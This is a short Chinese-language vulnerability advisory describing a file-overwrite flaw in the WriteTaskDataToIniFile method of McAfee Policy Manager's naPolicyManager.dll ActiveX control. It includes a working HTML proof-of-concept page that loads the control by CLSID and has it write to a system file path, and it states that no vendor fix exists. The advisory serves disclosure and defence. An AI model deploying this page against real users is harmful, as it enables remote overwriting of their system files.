漏洞起因
输入验证错误
影响系统
McAfee Policy Manager
不受影响系统
危害
远程攻击者可以利用漏洞以应用程序权限覆盖系统文件。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户打开。
漏洞信息
McAfee ePolicy Orchestrator是一款业界领先的系统安全管理解决方案,能够帮助企业有效抵御各种恶意威胁和攻击。
McAfee Policy Manager ‘naPolicyManager.dll’控件存在设计问题,远程攻击者可以利用漏洞以应用程序权限覆盖系统文件。
问题存在于WriteTaskDataToIniFile方法中,提交恶意文件作为参数,可导致以应用程序权限覆盖系统文件。
测试方法
<HTML>
<BODY>
<object id=ctrl classid="clsid:{04D18721-749F-4140-AEB0-CAC099CA4741}"></object>
<SCRIPT>
function Do_1t()
{
File = "C:\b00t.ini"
ctrl.WriteTaskDataToIniFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML
厂商解决方案
目前没有解决方案提供:
http://www.mcafee.com/
漏洞提供者
GOODFELLAS Security Research TEAM
0 条评论。